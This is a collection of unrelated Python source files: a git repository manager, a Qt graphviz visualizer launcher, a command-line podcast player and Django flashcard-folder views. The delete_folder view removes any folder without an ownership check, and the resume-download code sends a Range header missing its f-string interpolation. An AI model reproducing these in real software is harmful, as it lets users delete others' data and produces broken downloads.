close_at_end=False,
)
prog.change_message(
'Fetching branch:"{}" from "{}"'.format(branch, remote)
)
try:
self.fetch(remote)
except GitCommandError as e:
self.debug(e)
if not handled:
raise e
self.debug("fetch complete")
def merge():
try:
repo.git.merge("FETCH_HEAD")
except GitCommandError as e:
self.critical("Pull-merge FETCH_HEAD={}".format(e))
self.smart_pull(branch=branch, remote=remote)
if not use_auto_pull:
ahead, behind = self.ahead_behind(remote)
if behind:
if self.confirmation_dialog(
'Repository "{}" is behind the official version by {} changes.\n'
"Would you like to pull the available changes?".format(
self.name, behind
)
):
# show the changes
h = self.git_history_view(branch)
info = h.edit_traits(kind="livemodal")
if info.result:
merge()
else:
merge()
if use_progress:
prog.close()
self.debug("pull complete")
def has_remote(self, remote="origin"):
return bool(self._get_remote(remote))
def push(self, branch="master", remote=None, inform=False):
if remote is None:
remote = "origin"
rr = self._get_remote(remote)
if rr:
try:
self._repo.git.push(remote, branch)
if inform:
self.information_dialog("{} push complete".format(self.name))
except GitCommandError as e:
self.debug_exception()
if inform:
self.warning_dialog(
"{} push failed. See log file for more details".format(
self.name
)
)
# self._git_command(lambda g: g.push(remote, branch), tag='GitRepoManager.push')
else:
self.warning('No remote called "{}"'.format(remote))
def _git_command(self, func, tag):
try:
return func(self._repo.git)
except GitCommandError as e:
self.warning("Git command failed. {}, {}".format(e, tag))
def rebase(self, onto_branch="master"):
if self._repo:
repo = self._repo
branch = self.get_current_branch()
self.checkout_branch(onto_branch)
self.pull()
repo.git.rebase(onto_branch, branch)
def smart_pull(
self,
branch="master",
remote="origin",
quiet=True,
accept_our=False,
accept_their=False,
):
if remote not in self._repo.remotes:
return True
try:
ahead, behind = self.ahead_behind(remote)
except GitCommandError as e:
self.debug("Smart pull error: {}".format(e))
return
self.debug("Smart pull ahead: {} behind: {}".format(ahead, behind))
repo = self._repo
if behind:
if ahead:
if not quiet:
if not self.confirmation_dialog(
"You are {} behind and {} commits ahead. "
"There are potential conflicts that you will have to resolve."
"\n\nWould you like to Continue?".format(behind, ahead)
):
return
# check for unresolved conflicts
# self._resolve_conflicts(branch, remote, accept_our, accept_their, True)
try:
repo.git.merge("--abort")
except GitCommandError:
pass
# potentially conflicts
with StashCTX(repo) as error:
if error:
self.warning_dialog(
"Failed stashing your local changes. "
"Fix repository {} "
"before proceeding. {}".format(
os.path.basename(repo.working_dir), error
)
)
return
# do merge
try:
# repo.git.rebase('--preserve-merges', '{}/{}'.format(remote, branch))
repo.git.merge("{}/{}".format(remote, branch))
except GitCommandError:
if self.confirmation_dialog(
"There appears to be a conflict with {}."
"\n\nWould you like to accept the master copy (Yes).\n\nOtherwise "
"you will need to merge the changes manually (No)".format(
self.name
)
):
try:
repo.git.merge("--abort")
except GitCommandError:
pass
try:
repo.git.reset("--hard", "{}/{}".format(remote, branch))
except GitCommandError:
pass
elif self.confirmation_dialog(
"Would you like to accept all of your current changes even "
"though there are newer changes available?"
):
accept_our = True
# try:
# repo.git.pull('-X', 'theirs', '--commit', '--no-edit')
# return True
# except GitCommandError:
# clean = repo.git.clean('-n')
# if clean:
# if self.confirmation_dialog('''You have untracked files that could be an issue.
# {}
#
# You like to delete them and try again?'''.format(clean)):
# try:
# repo.git.clean('-fd')
# except GitCommandError:
# self.warning_dialog('Failed to clean repository')
# return
#
# try:
# repo.git.pull('-X', 'theirs', '--commit', '--no-edit')
# return True
# except GitCommandError:
# self.warning_dialog('Failed pulling changes for {}'.format(self.name))
# else:
# self.warning_dialog('Failed pulling changes for {}'.format(self.name))
# return
self._resolve_conflicts(branch, remote, accept_our, accept_their, quiet)
else:
self.debug("merging {} commits".format(behind))
self._git_command(
lambda g: g.merge("FETCH_HEAD"), "GitRepoManager.smart_pull/!ahead"
)
else:
self.debug("Up-to-date with {}".format(remote))
if not quiet:
self.information_dialog(
'Repository "{}" up-to-date with {}'.format(self.name, remote)
)
return True
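# Hedged usage sketch: a quiet update that prefers the remote copy on conflict
# (assumes `mgr` is an opened GitRepoManager instance):
#   mgr.smart_pull(branch="master", remote="origin", quiet=True, accept_their=True)
# Local changes are stashed via StashCTX before "{remote}/{branch}" is merged.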
def fetch(self, remote="origin"):
if self._repo:
return self._git_command(lambda g: g.fetch(remote), "GitRepoManager.fetch")
# return self._repo.git.fetch(remote)
def ahead_behind(self, remote="origin"):
self.debug("ahead behind")
repo = self._repo
ahead, behind = ahead_behind(repo, remote)
return ahead, behind
def merge(self, from_, to_=None, inform=True):
repo = self._repo
if to_:
dest = getattr(repo.branches, to_)
dest.checkout()
src = getattr(repo.branches, from_)
try:
repo.git.merge(src.commit)
except GitCommandError:
self.debug_exception()
if inform:
self.warning_dialog(
"Merging {} into {} failed. See log file for more details".format(
from_, to_
)
)
def commit(self, msg, author=None):
self.debug("commit message={}, author={}".format(msg, author))
index = self.index
if index:
try:
index.commit(msg, author=author, committer=author)
return True
except git.exc.GitError as e:
self.warning("Commit failed: {}".format(e))
def add(self, p, msg=None, msg_prefix=None, verbose=True, **kw):
repo = self._repo
# try:
# n = len(repo.untracked_files)
# except IOError:
# n = 0
# try:
# if not repo.is_dirty() and not n:
# return
# except OSError:
# pass
bp = os.path.basename(p)
dest = os.path.join(repo.working_dir, p)
dest_exists = os.path.isfile(dest)
if msg_prefix is None:
msg_prefix = "modified" if dest_exists else "added"
if not dest_exists:
self.debug("copying to destination.{}>>{}".format(p, dest))
shutil.copyfile(p, dest)
if msg is None:
msg = "{}".format(bp)
msg = "{} - {}".format(msg_prefix, msg)
if verbose:
self.debug("add to repo msg={}".format(msg))
self._add_to_repo(dest, msg, **kw)
def get_log(self, branch, *args):
if branch is None:
branch = self._repo.active_branch
# repo = self._repo
# l = repo.active_branch.log(*args)
return self.cmd("log", branch, "--oneline", *args).split("\n")
def get_commits_from_log(self, greps=None, max_count=None, after=None, before=None):
repo = self._repo
args = [repo.active_branch.name, "--remove-empty", "--simplify-merges"]
if max_count:
args.append("--max-count={}".format(max_count))
if after:
args.append("--after={}".format(after))
if before:
args.append("--before={}".format(before))
if greps:
greps = "\|".join(greps)
args.append("--grep=^{}".format(greps))
args.append(LOGFMT)
# txt = self.cmd('log', *args)
# self.debug('git log {}'.format(' '.join(args)))
cs = self._gitlog_commits(args)
return cs
def get_active_branch(self):
return self._repo.active_branch.name
def get_sha(self, path=None):
sha = ""
if path:
logstr = self.cmd("ls-tree", "HEAD", path)
try:
mode, kind, sha_name = logstr.split(" ")
sha, name = sha_name.split("\t")
except ValueError:
pass
return sha
def get_branch_diff(self, from_, to_):
args = ("{}..{}".format(from_, to_), LOGFMT)
return self._gitlog_commits(args)
def add_tag(self, name, message, hexsha=None):
args = ("-a", name, "-m", message)
if hexsha:
args = args + (hexsha,)
self.cmd("tag", *args)
# action handlers
def diff_selected(self):
if self._validate_diff():
if len(self.selected_commits) == 2:
l, r = self.selected_commits
dv = self._diff_view_factory(l, r)
open_view(dv)
def revert_to_selected(self):
# check for uncommitted changes
# warn user the uncommitted changes will be lost if revert now
commit = self.selected_commits[-1]
self.revert(commit.hexsha, self.selected)
def revert(self, hexsha, path):
self._repo.git.checkout(hexsha, path)
self.path_dirty = path
self._set_active_commit()
def revert_commit(self, hexsha):
self._git_command(lambda g: g.revert(hexsha), "revert_commit")
def load_file_history(self, p):
repo = self._repo
try:
hexshas = repo.git.log("--pretty=%H", "--follow", "--", p).split("\n")
self.selected_path_commits = self._parse_commits(hexshas, p)
self._set_active_commit()
except GitCommandError:
self.selected_path_commits = []
def get_modified_files(self, hexsha):
def func(git):
return git.diff_tree("--no-commit-id", "--name-only", "-r", hexsha)
txt = self._git_command(func, "get_modified_files")
return txt.split("\n")
# private
def _gitlog_commits(self, args):
txt = self._git_command(lambda g: g.log(*args), "log")
cs = []
if txt:
cs = [from_gitlog(l.strip()) for l in txt.split("\n")]
return cs
def _resolve_conflicts(self, branch, remote, accept_our, accept_their, quiet):
conflict_paths = self._get_conflict_paths()
self.debug("resolve conflict_paths: {}".format(conflict_paths))
if conflict_paths:
mm = MergeModel(conflict_paths, branch=branch, remote=remote, repo=self)
if accept_our:
mm.accept_our()
elif accept_their:
mm.accept_their()
else:
mv = MergeView(model=mm)
mv.edit_traits(kind="livemodal")
else:
if not quiet:
self.information_dialog("There were no conflicts identified")
def _get_conflict_paths(self):
def func(git):
return git.diff("--name-only", "--diff-filter=U")
txt = self._git_command(func, "get conflict paths")
return [line for line in txt.split("\n") if line.strip()]
def _validate_diff(self):
return True
def _diff_view_factory(self, a, b):
# d = self.diff(a.hexsha, b.hexsha)
if not a.blob:
a.blob = self.unpack_blob(a.hexsha, a.name)
if not b.blob:
b.blob = self.unpack_blob(b.hexsha, b.name)
model = DiffModel(left_text=b.blob, right_text=a.blob)
dv = DiffView(model=model)
return dv
def _add_to_repo(self, p, msg, commit=True):
index = self.index
if index:
if not isinstance(p, list):
p = [p]
try:
index.add(p)
except IOError as e:
self.warning('Failed to add file. Error:"{}"'.format(e))
# an IOError has been caused in the past by "'...index.lock' could not be obtained"
os.remove(os.path.join(self.path, ".git", "index.lock"))
try:
self.warning('Retrying add after failure. Error:"{}"'.format(e))
index.add(p)
except IOError as e:
self.warning('Retry failed. Error:"{}"'.format(e))
return
if commit:
index.commit(msg)
def _get_remote(self, remote):
repo = self._repo
try:
return getattr(repo.remotes, remote)
except AttributeError:
pass
def _get_branch_history(self):
repo = self._repo
hexshas = repo.git.log("--pretty=%H").split("\n")
return hexshas
def _load_branch_history(self):
hexshas = self._get_branch_history()
self.commits = self._parse_commits(hexshas)
def _parse_commits(self, hexshas, p=""):
def factory(ci):
repo = self._repo
obj = repo.rev_parse(ci)
cx = GitSha(
message=obj.message,
hexsha=obj.hexsha,
name=p,
date=obj.committed_datetime,
)
# date=format_date(obj.committed_date))
return cx
return [factory(ci) for ci in hexshas]
def _set_active_commit(self):
p = self.selected
with open(p, "r") as rfile:
chexsha = hashlib.sha1(rfile.read()).hexdigest()
for c in self.selected_path_commits:
blob = self.unpack_blob(c.hexsha, p)
c.active = chexsha == hashlib.sha1(blob).hexdigest() if blob else False
self.refresh_commits_table_needed = True
# handlers
def _selected_fired(self, new):
if new:
self._selected_hook(new)
self.load_file_history(new)
def _selected_hook(self, new):
pass
def _remote_changed(self, new):
if new:
self.delete_remote()
r = "https://github.com/{}".format(new)
self.create_remote(r)
@property
def index(self):
return self._repo.index
@property
def active_repo(self):
return self._repo
if __name__ == "__main__":
repo = GitRepoManager()
repo.open_repo("/Users/ross/Sandbox/mergetest/blocal")
repo.smart_pull()
# rp = GitRepoManager()
# rp.init_repo('/Users/ross/Pychrondata_dev/scripts')
# rp.commit_dialog()
# ============= EOF =============================================
# repo manager protocol
# def get_local_changes(self, repo=None):
# repo = self._get_repo(repo)
# diff_str = repo.git.diff('--full-index')
# patches = map(str.strip, diff_str.split('diff --git'))
# patches = ['\n'.join(p.split('\n')[2:]) for p in patches[1:]]
#
# diff_str = StringIO(diff_str)
# diff_str.seek(0)
# index = Diff._index_from_patch_format(repo, diff_str)
#
# return index, patches
# def is_dirty(self, repo=None):
# repo = self._get_repo(repo)
# return repo.is_dirty()
# def get_untracked(self):
# return self._repo.untracked_files
# def _add_repo(self, root):
# existed=True
# if not os.path.isdir(root):
# os.mkdir(root)
# existed=False
#
# gitdir=os.path.join(root, '.git')
# if not os.path.isdir(gitdir):
# repo = Repo.init(root)
# existed = False
# else:
# repo = Repo(root)
#
# return repo, existed
# def add_repo(self, localpath):
# """
# add a blank repo at ``localpath``
# """
# repo, existed=self._add_repo(localpath)
# self._repo=repo
# self.root=localpath
# return existed
|
graphviz_visualizer_no_ros.py
|
# Copyright (c) 2021 Fynn Boyer
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This Python file uses the following encoding: utf-8
import sys
import signal
import os
from threading import Thread
from PySide2 import QtCore
from PySide2.QtWidgets import QApplication
from PySide2.QtCore import Qt, QCoreApplication
script_dir = os.path.dirname(__file__)
graphviz_visualizer_dir = os.path.join(script_dir, '..')
sys.path.append(graphviz_visualizer_dir)
import graphviz_visualizer.graphviz_visualizer as graphviz_visualizer
def get_path_to_executed_script():
"""! Get the path to the executed script """
return os.path.dirname( __file__ )
def get_dotfile_template_path(template_file_name):
"""! Get the path to a dotfile template file
@param template_file_name The name of the template file
"""
return os.path.join(get_path_to_executed_script(), "..", "assets", "templates", template_file_name)
def get_ui_file_path(ui_file_name):
"""! Get the path to a dotfile template file
@param template_file_name The name of the ui file
"""
return os.path.join(get_path_to_executed_script(), "..", "assets", "ui", ui_file_name)
def prompt_user_input(graph_vis):
"""! Ask the user for input to update the graph """
while True:
print("Provide a new state for a graph.")
graph_name = input("Enter graph name:")
state_name = input("Enter state:")
graph_vis.update_graph_state(graph_name, state_name)
print("")
def main(args=None):
graph_config = [
{"name": "high_level_fsm",
"current_state": "Init",
"dotfile_template_path": get_dotfile_template_path("task_management_fsm.j2")
},
{"name": "locomotion",
"current_state": "NoDataYet",
"dotfile_template_path": get_dotfile_template_path("task_management_fsm.j2")
},
{"name": "example_graph",
"current_state": "State0",
"dotfile_template_path": get_dotfile_template_path("example_graph.j2")
},
{"name": "example_tree",
"current_state": "chase_ghost",
"dotfile_template_path": get_dotfile_template_path("example_tree.j2")
}
]
node_names = ["Node1", "Node2","Node3","Node4","Node5","Node6","Node7","Node8","Node9","Node10"]
QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_ShareOpenGLContexts)
app = QApplication([])
setup_interrupt_handling()
ui_path = get_ui_file_path("graphviz_visualizer.ui")
graph_vis = graphviz_visualizer.GraphvizVisualizer(graph_config, node_names, ui_path)
graph_vis.ui.show()
t = Thread(target=prompt_user_input, args=(graph_vis,), daemon=True)
t.start()
app.exec_()
# t.join()
sys.exit()
# Interrupt handling code from here: https://coldfix.eu/2016/11/08/pyqt-boilerplate/
# Call this function in your main after creating the QApplication
def setup_interrupt_handling():
"""Setup handling of KeyboardInterrupt (Ctrl-C) for PyQt."""
signal.signal(signal.SIGINT, _interrupt_handler)
# Regularly run some (any) python code, so the signal handler gets a
# chance to be executed:
safe_timer(50, lambda: None)
# Define this as a global function to make sure it is not garbage
# collected when going out of scope:
def _interrupt_handler(signum, frame):
"""Handle KeyboardInterrupt: quit application."""
QCoreApplication.quit()
def safe_timer(timeout, func, *args, **kwargs):
"""
Create a timer that is safe against garbage collection and overlapping
calls. See: http://ralsina.me/weblog/posts/BB974.html
"""
def timer_event():
try:
func(*args, **kwargs)
finally:
QtCore.QTimer.singleShot(timeout, timer_event)
QtCore.QTimer.singleShot(timeout, timer_event)
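# Hedged usage sketch: keep the Python interpreter "awake" under the Qt event loop so
# the SIGINT handler installed above actually gets a chance to run; any no-op works:
#   safe_timer(50, lambda: None)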
if __name__ == "__main__":
main()
|
getpodcast.py
|
#! /usr/bin/env python3
"""My Podcaster."""
import datetime
import email.utils
from subprocess import call, check_output
import mimetypes
import os
import re
import shutil
import socket
import urllib.error
import urllib.request
import requests
import tqdm
import random
import signal
from Podcast import Podcast
import configparser
from prompt_toolkit import print_formatted_text, HTML
import bs4
import pandas
random.seed(os.urandom(128))
mimetypes.init()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0) like Gecko",
}
podconfig = configparser.ConfigParser()
podconfig.read(os.path.abspath(os.path.expanduser("~/.podcasterrc")))
PODFILE = podconfig["default"]["podfile"]
BETTERRANDOM = str(podconfig["betterrandom"]["master"]).upper()
BETTERRANDOM_HISTCOUNT = int(podconfig["betterrandom"]["histcount"])
BETTERRANDOM_HIST = os.path.abspath(
os.path.expanduser(podconfig["betterrandom"]["file"]),
)
TIMEOUT = int(podconfig["default"]["timeout"])
DOWNLOADDIR = os.path.abspath(os.path.expanduser(podconfig["default"]["downloaddir"]))
def write_history(pod, title):
"""Append history to a file."""
try:
PLAYED = pandas.read_csv(BETTERRANDOM_HIST, index_col=0)
except FileNotFoundError:
PLAYED = pandas.DataFrame(columns=["Podcast", "Title"])
PLAYED = PLAYED.append({"Podcast": pod, "Title": title}, ignore_index=True)
PLAYED.to_csv(BETTERRANDOM_HIST)
def check_history(pod, title):
"""See if Pod was already played from recent history."""
try:
PLAYED = pandas.read_csv(BETTERRANDOM_HIST, index_col=0)
except FileNotFoundError:
PLAYED = pandas.DataFrame(columns=["Podcast", "Title"])
return any(PLAYED[-BETTERRANDOM_HISTCOUNT:].isin([pod, title]).all(axis="columns"))
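# Hedged example of the history CSV read/written above (index column plus two fields):
#   ,Podcast,Title
#   0,Some Podcast,Episode 12
#   1,Another Feed,Local File
# check_history() only inspects the last BETTERRANDOM_HISTCOUNT rows.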
def TimedInput(prompt="", default=None, timeout=TIMEOUT):
"""Input with timeout."""
import threading
import time
def print_countdown():
t = threading.current_thread()
while getattr(t, "do_run", True):
try:
time.sleep(1)
countdown = int(signal.getitimer(signal.ITIMER_REAL)[0])
print(countdown + 1, end="..", flush=True)
if bool(countdown):
continue
return
except AlarmException:
return
class AlarmException(Exception):
pass
def alarmHandler(signum, frame):
raise AlarmException
signal.signal(signal.SIGALRM, alarmHandler)
signal.alarm(timeout)
t = threading.Thread(target=print_countdown)
t.start()
try:
text = input(prompt)
signal.alarm(0)
t.do_run = False
t.join()
return text
except AlarmException:
pass
signal.signal(signal.SIGALRM, signal.SIG_IGN)
return default
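# Hedged usage sketch: wait up to TIMEOUT seconds for an answer, defaulting to "Y":
#   ans = TimedInput(prompt="Play? (Y/n) Defaulting in:", default="Y")
# The SIGALRM handler aborts input() and stops the countdown thread when time runs out.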
def getpodcast(podcastfile: str, songs: bool) -> None:
"""Get Podcast."""
# keep picking random podcasts from the config file and playing them
print(f"Reading from File: {podcastfile}")
get = True
while get:
podlist = configparser.ConfigParser()
podlist.read(podcastfile)
podchoice = random.choice(list(podlist))
if podchoice == "DEFAULT":
continue
if songs:
if ("songs" in podlist[podchoice].keys()) \
and (str(podlist[podchoice]['songs']).upper() == 'TRUE'):
get = process_podcast(podlist[podchoice])
else:
continue
else:
get = process_podcast(podlist[podchoice])
def process_podcast(podchoice):
"""Process Podcast."""
# process the randomly chosen podcast entry
pod = podchoice["title"]
url = podchoice["url"]
lastcount = None
firstcount = None
youtubelink = False
print(pod, url)
if "lastcount" in podchoice.keys():
lastcount = int(podchoice["lastcount"])
if "firstcount" in podchoice.keys():
firstcount = int(podchoice["firstcount"])
if "youtubelink" in podchoice.keys():
youtubelink = str(podchoice['youtubelink']).upper()
if youtubelink == 'TRUE':
print("Youtube Playlist: ", pod)
ytvideolist = check_output(
["youtube-dl", "--get-id", "--flat-playlist", url],
).split()
ytvideo = random.choice(ytvideolist[firstcount:lastcount])
title = check_output(
[
"youtube-dl",
"--get-title",
f"https://www.youtube.com/watch?v={ytvideo.decode()}",
],
)
description = check_output(
[
"youtube-dl",
"--get-description",
f"https://www.youtube.com/watch?v={ytvideo.decode()}",
],
)
print("Video Title: ", title.decode())
print("Video Description: ", description.decode())
if check_history(pod, title.decode()):
print("Skipping Because Played Recently")
return True
call(
[
"mpv",
"--no-video",
"--term-osd-bar",
"--term-osd-bar-chars=[##-]",
"--msg-level=all=error,statusline=status",
"--ytdl",
f"https://www.youtube.com/watch?v={ytvideo.decode()}",
],
)
write_history(pod, title.decode())
return True
if url[:4] == "file":
newfilename = url[6:]
if check_history(pod, "Local File"):
print("Skipping Because Played Recently")
return True
ans = TimedInput(prompt="Play local copy ? (Y/n) Defaulting in:", default="Y")
if not ans == "n":
call(
[
"mpv",
"--no-video",
"--term-osd-bar",
"--term-osd-bar-chars=[##-]",
"--msg-level=all=error,statusline=status",
newfilename,
],
)
write_history(pod, "Local File")
return True
if url[:4] == "http":
try:
request = urllib.request.Request(url, headers=headers)
content = urllib.request.urlopen(request)
podcast = Podcast(content.read())
except (urllib.error.HTTPError, urllib.error.URLError) as err:
print(f"Podcast: {pod}")
print(f"Connection error: {err}")
return # continue
while True:
item = random.choice(podcast.items[firstcount:lastcount])
if not item.enclosure_type:
print(item.title, ":", item.link)
print("Not Playing, No links available")
return True
try:
finish_playing = process_podcast_item(pod, item)
if finish_playing:
return True
return False
except SkipPodcast:
return True
print("Weird URL in File", url)
exit()
class SkipPodcast(Exception):
"""Skipping if the podcast isn't found."""
pass
def process_podcast_item(pod: str, item: dict):
"""Process a single item from pod."""
# skip if date is older than --date-from
data = {
"podcast": pod,
"date": item.date_time.strftime("%d.%m.%Y"),
"title": getSafeFilenameFromText(item.title.strip(" .")), # scrub title
"year": str(item.date_time.year),
"ext": parseFileExtensionFromUrl(item.enclosure_url)
or mimetypes.guess_extension(item.enclosure_type),
}
newfilelength = 0
newfilemtime = item.time_published
newfilename = os.path.join(DOWNLOADDIR, pod, f"{data['title']}_{data['date']}{data['ext']}")
print(f"Podcast Series: {pod}")
print(f"Episode Title: {data['title']}")
print(f"Date: {data['date']}")
if item.description:
print("Description:")
print_formatted_text(HTML(bs4.BeautifulSoup(item.description, "html.parser")))
ans = TimedInput(prompt="Try Streaming ? (Y/n/[s]kip) Defaulting in:", default="Y")
if ans == "s":
return True
if not ans == "n":
if check_history(pod, data["title"]):
print("Skipping Because Played Recently")
return True
call(
[
"mpv",
"--no-video",
"--term-osd-bar",
"--term-osd-bar-chars=[##-]",
"--msg-level=all=error,statusline=status",
item.enclosure_url,
],
)
write_history(pod, data["title"])
return True
# if file exist we check if filesize match with content length...
print(f"File: {newfilename}:")
if os.path.isfile(newfilename):
newfilelength = os.path.getsize(newfilename)
try:
validateFile(
newfilename,
item.time_published,
item.enclosure_length,
item.enclosure_url,
)
except (urllib.error.HTTPError, urllib.error.URLError):
print("Connection when verifying existing file")
return # continue
except socket.timeout:
print("Connection timeout when downloading file")
return # continue
# download or resume podcast. retry if timeout. cancel if error
cancel_validate, newfilelength = try_download_item(
newfilelength, newfilename, item,
)
if cancel_validate:
return # continue
# validate downloaded file
try:
if validateFile(newfilename, 0, item.enclosure_length, item.enclosure_url):
# set mtime if validated
os.utime(newfilename, (newfilemtime, newfilemtime))
print("File validated")
elif newfilelength:
# did not validate. see if we got same size as last time we
# downloaded this file
if newfilelength == os.path.getsize(newfilename):
# ok, size is same. maybe data from response and rss is wrong.
os.utime(newfilename, (newfilemtime, newfilemtime))
print("File is assumed to be ok.")
except urllib.error.HTTPError:
print("Connection error when verifying download")
return # continue
except socket.timeout:
print("Connection timeout when downloading file")
return # continue
call(
[
"mpv",
"--no-video",
"--term-osd-bar",
"--term-osd-bar-chars=[##-]",
"--msg-level=all=error,statusline=status",
newfilename,
],
)
return True
def try_download_item(newfilelength, newfilename, item):
"""Try downloading item."""
# download or resume podcast. retry if timeout. cancel if error
retry_downloading = True
while retry_downloading:
retry_downloading = False
cancel_validate = False
try:
if newfilelength:
resumeDownloadFile(newfilename, item.enclosure_url)
else:
downloadFile(newfilename, item.enclosure_url)
except (urllib.error.HTTPError, urllib.error.URLError):
print("Connection error when downloading file")
cancel_validate = True
except socket.timeout:
if newfilelength:
if os.path.getsize(newfilename) > newfilelength:
print("Connection timeout. File partly resumed. Retrying")
retry_downloading = True
newfilelength = os.path.getsize(newfilename)
else:
print("Connection timeout when resuming file")
cancel_validate = True
else:
if os.path.isfile(newfilename):
newfilelength = os.path.getsize(newfilename)
if newfilelength > 0:
print("Connection timeout. File partly downloaded. Retrying")
retry_downloading = True
else:
print("Connection timeout when downloading file")
cancel_validate = True
else:
print("Connection timeout when downloading file")
cancel_validate = True
return cancel_validate, newfilelength
def downloadFile(newfilename: str, enclosure_url: str) -> None:
"""Download File."""
# create download dir path if it does not exist
if not os.path.isdir(os.path.dirname(newfilename)):
os.makedirs(os.path.dirname(newfilename))
# download podcast
print("Downloading ...")
r = requests.get(enclosure_url, stream=True)
# Total size in bytes.
total_size = int(r.headers.get("content-length", 0))
block_size = 1024 # 1 Kibibyte
with tqdm.tqdm(total=total_size, unit="iB", unit_scale=True) as t:
with open(newfilename, "wb") as out_file:
for data in r.iter_content(block_size):
t.update(len(data))
out_file.write(data)
if total_size != 0 and t.n != total_size:
print("ERROR, something went wrong")
"""
request = urllib.request.Request(enclosure_url)
with urllib.request.urlopen(request, timeout=30) as response:
total_size = int(response.info()["Content-Length"])
block_size = 1024 # 1 Kibibyte
with open(newfilename, "wb") as out_file:
shutil.copyfileobj(response, out_file, 100 * 1024)
"""
print("Download complete")
def resumeDownloadFile(newfilename: str, enclosure_url: str, headers: dict = headers) -> None:  # default to the module-level headers
"""Resume file download."""
# find start-bye and total byte-length
print("Prepare resume")
request = urllib.request.Request(enclosure_url, headers=headers)
with urllib.request.urlopen(request) as response:
info = response.info()
if "Content-Length" in info:
contentlength = int(info["Content-Length"])
else:
contentlength = -1
if os.path.isfile(newfilename):
start_byte = os.path.getsize(newfilename)
else:
start_byte = 0
request = urllib.request.Request(enclosure_url, headers=headers)
if start_byte > 0:
if start_byte >= contentlength:
print("Resume not possible. (startbyte greater then contentlength)")
return
request.add_header("Range", "bytes={start_byte}-")
with urllib.request.urlopen(request, timeout=30) as response:
with open(newfilename, "ab+") as out_file:
info = response.info()
out_file.seek(start_byte)
if "Content-Range" in info:
contentrange = info["Content-Range"].split(" ")[1].split("-")[0]
if not int(contentrange) == start_byte:
print("Resume not possible. Cannot resume from byte {start_byte}")
return
if not out_file.tell() == start_byte:
print("Resume not possible. Cannot append data from byte {start_byte}")
return
print("Start resume from byte {start_byte}")
print("Downloading ...")
shutil.copyfileobj(response, out_file, 100 * 1024)
print("Resume complete")
def validateFile(
newfilename: str, time_published: int, enclosure_length: int, enclosure_url: str,
) -> bool:
"""Validate File."""
if os.path.isfile(newfilename + ".err"):
return True # skip file
# try to validate size
filelength = os.path.getsize(newfilename)
if enclosure_length:
if abs(filelength - enclosure_length) <= 1:
return True
else:
enclosure_length = 0
request = urllib.request.Request(enclosure_url)
with urllib.request.urlopen(request) as response:
info = response.info()
if "Content-MD5" in info:
print(f"Content-MD5:{info['Content-MD5']}")
if "Content-Length" in info:
contentlength = int(info["Content-Length"])
if abs(filelength - contentlength) <= 1:
return True
elif filelength > contentlength:
return True
print(
"Filelength and content-length mismatch."
f"filelength:{filelength}"
f"enclosurelength:{enclosure_length}"
f" contentlength:{int(info.get('Content-Length', '0'))}",
)
# if size validation fail, try to validate mtime.
if time_published:
filemtime = parseUnixTimeToDatetime(os.path.getmtime(newfilename))
time_published = parseUnixTimeToDatetime(time_published)
if time_published == filemtime:
return True
if "Last-Modified" in info:
last_modified = parseRftTimeToDatetime(info["Last-Modified"])
if last_modified == filemtime:
return True
else:
last_modified = ""
print(
f"Last-Modified mismatch."
f" file-mtime:{filemtime}"
f" Last-Modified:{last_modified}"
f" pubdate:{time_published}",
)
return False
def getSafeFilenameFromText(text):
"""Get safe filename from text."""
# remove reserved windows keywords
reserved_win_keywords = r"(PRN|AUX|CLOCK\$|NUL|CON|COM[1-9]|LPT[1-9])"
# remove reserved windows characters
reserved_win_chars = '[\x00-\x1f\\\\?*:";|/<>]'
# reserved posix is included in reserved_win_chars. reserved_posix_characters= '/\0'
extra_chars = "[$@{}]"
tmp = re.sub(
"|".join((reserved_win_keywords, reserved_win_chars, extra_chars)), "", text,
)
return tmp
def parseFileExtensionFromUrl(enclosure_url):
"""File Extension Finder."""
return os.path.splitext(enclosure_url)[1].split("?")[0].lower()
def parseRftTimeToDatetime(datetimestr: str) -> datetime.datetime:
"""Rft time to Date Time."""
return email.utils.parsedate_to_datetime(datetimestr)
def parseUnixTimeToDatetime(datetimestamp: int) -> datetime.datetime:
"""Unix time to date time."""
return datetime.datetime.fromtimestamp(datetimestamp)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Podcaster")
parser.add_argument(
"-f", "--podcastfile", type=str, help="podcast file location", default=PODFILE,
)
parser.add_argument(
"--songs", help="song mode", action='store_true',
)
args = parser.parse_args()
podcastfilepath = os.path.abspath(os.path.expanduser(args.podcastfile))
if args.songs:
print("Executing in songs mode")
try:
getpodcast(podcastfilepath, args.songs)
except KeyboardInterrupt:
signal.alarm(0)
print("\nExiting..")
exit()
|
views.py
|
from django.http import HttpResponse
from django.shortcuts import render, get_object_or_404, redirect
from django.contrib.auth.decorators import login_required
from .forms import FolderForm, CardsForm
from .multithreads import *
from threading import Thread
from .models import CardFolder, MultiCard
@login_required
def home(request):
return redirect('/')
def demo_welcome(request):
form = FolderForm(request.POST or None)
context = {
"folder_form": form
}
return render(request, 'Cards/demo/welcome.html', context)
# region Folder
@login_required
def delete_folder(request, set_id):
if request.method == 'POST':
folder = CardFolder.objects.get(id=set_id)
folder.delete()
return redirect('/')
else:
return redirect('/')
@login_required
def add_folder(request):
form = FolderForm(request.POST or None)
if form.is_valid():
if request.method == "POST":
folder = CardFolder.objects.create(user=request.user, **form.cleaned_data)
enough = len(folder.multicard_set.all()) > 2
return render(request, 'Cards/view_set.html', {'folder': folder, 'enough': enough})
context = {
"form": form
}
return render(request, 'Cards/add_set.html', context)
@login_required
def edit_folder(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
if folder.being_edited:
return render(request, 'Cards/folder_being_updated.html', {'folder': folder})
if request.method == 'POST':
form = FolderForm(request.POST or None, instance=folder)
if form.is_valid():
folder = form.save(commit=False)
folder.being_edited = True
folder.save()
t = Thread(target=edit_folder_translate, args=[folder])
t.setDaemon(False)
t.start()
enough = len(folder.multicard_set.all()) > 2
return render(request, 'Cards/view_set.html', {'folder': folder, 'enough': enough})
else:
form = FolderForm(instance=folder)
